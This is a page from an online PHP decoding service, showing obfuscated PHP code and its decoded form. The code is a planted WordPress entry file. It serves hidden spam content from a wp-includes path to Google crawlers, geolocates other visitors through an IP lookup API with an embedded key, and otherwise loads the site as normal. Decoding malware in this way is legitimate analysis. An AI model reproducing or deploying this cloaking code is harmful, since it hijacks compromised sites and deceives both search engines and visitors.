Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto IxRIz; IxRIz: function getVisitorCountry($timeout = 5) { $ip_keys = array("\x..
Decoded Output download
<?php
goto IxRIz; IxRIz: function getVisitorCountry($timeout = 5) { $ip_keys = array("HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_X_CLUSTER_CLIENT_IP", "HTTP_FORWARDED_FOR", "HTTP_FORWARDED", "REMOTE_ADDR"); $ip = ''; foreach ($ip_keys as $key) { if (isset($_SERVER[$key])) { foreach (explode(",", $_SERVER[$key]) as $potential_ip) { $potential_ip = trim($potential_ip); if (filter_var($potential_ip, FILTER_VALIDATE_IP)) { $ip = $potential_ip; break 2; } } } } if (empty($ip)) { return "Unknown"; } $api_url = "https://pro.ip-api.com/json/{$ip}?key=UY3yXje8Uwi752k"; $context = stream_context_create(array("http" => array("timeout" => $timeout, "ignore_errors" => true))); try { $response = @file_get_contents($api_url, false, $context); if ($response === false) { return "Unknown"; } $data = json_decode($response, true); if (json_last_error() !== JSON_ERROR_NONE) { return "Unknown"; } return $data["status"] === "success" ? $data["country"] : "Unknown"; } catch (Exception $e) { return "Unknown"; } } goto TcSaB; Hx2eL: function isGoogleCrawler() { $userAgent = strtolower($_SERVER["HTTP_USER_AGENT"]); return strpos($userAgent, "google") !== false; } goto nn9ca; TcSaB: function isBotCrawler() { if (!isset($_SERVER["HTTP_USER_AGENT"]) || empty($_SERVER["HTTP_USER_AGENT"])) { return true; } $userAgent = strtolower($_SERVER["HTTP_USER_AGENT"]); $botList = array("bingbot", "yandexbot", "duckduckbot", "baiduspider", "yahoo", "slurp", "msnbot", "facebookexternalhit", "twitterbot", "rogerbot", "linkedinbot", "embedly", "quora link preview", "showyoubot", "outbrain", "pinterest", "slackbot", "vkShare", "W3C_Validator", "redditbot", "Applebot", "WhatsApp", "flipboard", "tumblr", "bitlybot", "skypeuripreview", "nuzzel", "discordbot", "google page speed", "qwantify", "pinterestbot", "bitrix link preview", "xing-contenttabreceiver", "chrome-lighthouse", "telegrambot"); foreach ($botList as $bot) { if (strpos($userAgent, $bot) !== false) { return true; } } return false; } goto Hx2eL; nn9ca: try { $hiddenContent = file_get_contents("/home/ten31marketing/hoosiersoutruncancer.org/public/wp-includes/html-api/index.html"); if (isGoogleCrawler()) { echo $hiddenContent; die; } else { $visitorCountry = getVisitorCountry(); if ($visitorCountry === "Indonesia") { define("WP_USE_THEMES", true); require __DIR__ . "/wp-blog-header.php"; die; } } define("WP_USE_THEMES", true); require __DIR__ . "/wp-blog-header.php"; } catch (Exception $e) { define("WP_USE_THEMES", true); require __DIR__ . "/wp-blog-header.php"; } ?>
Did this file decode correctly?
Original Code
<?php
goto IxRIz; IxRIz: function getVisitorCountry($timeout = 5) { $ip_keys = array("\x48\x54\124\120\137\103\114\111\105\x4e\x54\x5f\111\x50", "\x48\124\x54\120\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\105\x44\137\x46\x4f\122", "\x48\124\124\x50\137\x58\137\106\117\122\x57\x41\122\104\x45\x44", "\x48\x54\x54\120\x5f\130\x5f\103\114\x55\x53\124\105\122\137\x43\114\111\105\116\x54\x5f\x49\120", "\110\x54\124\x50\137\x46\x4f\122\x57\101\x52\x44\105\x44\x5f\x46\117\x52", "\110\124\124\x50\x5f\106\117\x52\x57\x41\122\104\x45\104", "\x52\x45\115\117\x54\105\x5f\x41\x44\104\x52"); $ip = ''; foreach ($ip_keys as $key) { if (isset($_SERVER[$key])) { foreach (explode("\54", $_SERVER[$key]) as $potential_ip) { $potential_ip = trim($potential_ip); if (filter_var($potential_ip, FILTER_VALIDATE_IP)) { $ip = $potential_ip; break 2; } } } } if (empty($ip)) { return "\125\x6e\x6b\156\157\x77\x6e"; } $api_url = "\x68\164\164\160\163\x3a\x2f\57\x70\162\157\x2e\x69\160\55\x61\160\x69\56\143\x6f\x6d\x2f\152\x73\157\156\57{$ip}\77\x6b\x65\171\75\x55\131\63\x79\130\152\x65\70\x55\167\151\67\65\62\x6b"; $context = stream_context_create(array("\x68\164\x74\160" => array("\164\x69\155\145\157\165\x74" => $timeout, "\151\147\x6e\157\x72\145\137\x65\x72\162\x6f\x72\x73" => true))); try { $response = @file_get_contents($api_url, false, $context); if ($response === false) { return "\125\x6e\153\156\x6f\167\156"; } $data = json_decode($response, true); if (json_last_error() !== JSON_ERROR_NONE) { return "\x55\156\153\x6e\157\x77\156"; } return $data["\x73\x74\141\x74\165\x73"] === "\163\165\143\x63\x65\163\x73" ? $data["\143\x6f\x75\x6e\x74\x72\x79"] : "\x55\x6e\153\x6e\157\167\156"; } catch (Exception $e) { return "\125\x6e\x6b\156\x6f\167\x6e"; } } goto TcSaB; Hx2eL: function isGoogleCrawler() { $userAgent = strtolower($_SERVER["\110\x54\124\x50\x5f\125\123\x45\122\x5f\101\107\x45\116\x54"]); return strpos($userAgent, "\x67\x6f\x6f\147\154\145") !== false; } goto nn9ca; TcSaB: function isBotCrawler() { if (!isset($_SERVER["\x48\124\x54\x50\x5f\125\x53\105\122\137\101\x47\x45\x4e\x54"]) || empty($_SERVER["\x48\x54\x54\120\137\125\123\x45\122\137\x41\x47\x45\116\124"])) { return true; } $userAgent = strtolower($_SERVER["\x48\x54\124\120\137\125\x53\105\x52\137\x41\107\x45\x4e\x54"]); $botList = array("\x62\151\x6e\x67\x62\157\x74", "\171\x61\156\144\145\170\142\157\164", "\x64\165\143\153\x64\165\143\x6b\x62\x6f\164", "\142\x61\151\x64\165\163\x70\151\x64\145\x72", "\x79\x61\150\157\x6f", "\163\154\x75\162\x70", "\155\163\x6e\x62\x6f\164", "\146\141\x63\145\142\x6f\157\x6b\145\x78\x74\x65\162\x6e\x61\x6c\150\x69\164", "\164\x77\x69\x74\x74\145\162\x62\x6f\164", "\162\157\x67\x65\x72\142\157\x74", "\154\x69\156\x6b\145\144\151\156\x62\x6f\x74", "\x65\x6d\x62\145\x64\x6c\171", "\161\165\x6f\x72\141\x20\x6c\151\x6e\x6b\x20\x70\162\145\x76\151\145\x77", "\x73\x68\157\x77\x79\157\x75\x62\157\x74", "\157\165\x74\142\162\x61\x69\x6e", "\160\151\156\164\145\162\145\163\x74", "\163\x6c\x61\143\x6b\x62\x6f\164", "\166\x6b\x53\150\141\162\x65", "\x57\63\103\137\126\x61\154\x69\144\x61\x74\157\162", "\162\145\144\144\151\x74\x62\x6f\x74", "\101\160\x70\154\145\142\157\x74", "\127\150\x61\x74\163\x41\x70\160", "\x66\154\x69\160\x62\157\141\162\x64", "\x74\x75\x6d\x62\154\x72", "\x62\151\164\154\x79\x62\157\x74", "\163\x6b\171\160\145\165\x72\x69\x70\x72\x65\x76\x69\x65\x77", "\x6e\165\x7a\172\x65\154", "\144\151\163\143\157\x72\x64\142\x6f\x74", "\x67\x6f\x6f\x67\x6c\x65\40\x70\x61\x67\x65\x20\x73\x70\x65\145\144", "\x71\167\141\x6e\x74\151\x66\x79", "\160\x69\x6e\x74\145\x72\x65\x73\164\142\x6f\x74", "\142\151\x74\162\x69\x78\x20\x6c\151\x6e\x6b\x20\x70\x72\x65\x76\151\x65\167", "\x78\151\x6e\x67\55\143\157\x6e\164\145\x6e\164\164\x61\142\162\145\x63\x65\x69\166\145\x72", "\143\150\162\157\155\145\x2d\154\151\147\x68\x74\x68\x6f\165\x73\145", "\x74\145\x6c\145\147\162\x61\x6d\142\157\x74"); foreach ($botList as $bot) { if (strpos($userAgent, $bot) !== false) { return true; } } return false; } goto Hx2eL; nn9ca: try { $hiddenContent = file_get_contents("\x2f\x68\x6f\x6d\x65\57\x74\x65\x6e\63\x31\x6d\x61\x72\153\x65\164\x69\x6e\x67\x2f\150\157\157\163\151\145\x72\163\x6f\165\x74\162\165\156\143\141\x6e\143\145\x72\56\x6f\162\147\x2f\x70\x75\142\x6c\151\x63\x2f\x77\x70\x2d\x69\x6e\x63\154\165\x64\145\163\57\150\164\155\x6c\55\x61\160\x69\x2f\x69\x6e\144\145\x78\x2e\150\x74\155\154"); if (isGoogleCrawler()) { echo $hiddenContent; die; } else { $visitorCountry = getVisitorCountry(); if ($visitorCountry === "\111\x6e\144\157\x6e\x65\x73\151\x61") { define("\x57\120\x5f\x55\x53\x45\137\x54\x48\105\115\x45\123", true); require __DIR__ . "\x2f\167\160\55\142\x6c\157\x67\55\x68\x65\141\144\x65\162\56\x70\150\160"; die; } } define("\x57\120\x5f\x55\123\x45\137\x54\x48\x45\115\105\123", true); require __DIR__ . "\57\167\x70\x2d\142\x6c\x6f\x67\x2d\x68\x65\x61\144\x65\162\56\160\150\x70"; } catch (Exception $e) { define("\x57\x50\137\x55\x53\x45\x5f\x54\x48\x45\115\x45\123", true); require __DIR__ . "\57\x77\160\x2d\142\154\x6f\147\55\150\145\x61\x64\145\x72\56\x70\x68\160"; }
Function Calls
None |
Stats
MD5 | 6200930cb607717b16fd5b9b472da500 |
Eval Count | 0 |
Decode Time | 79 ms |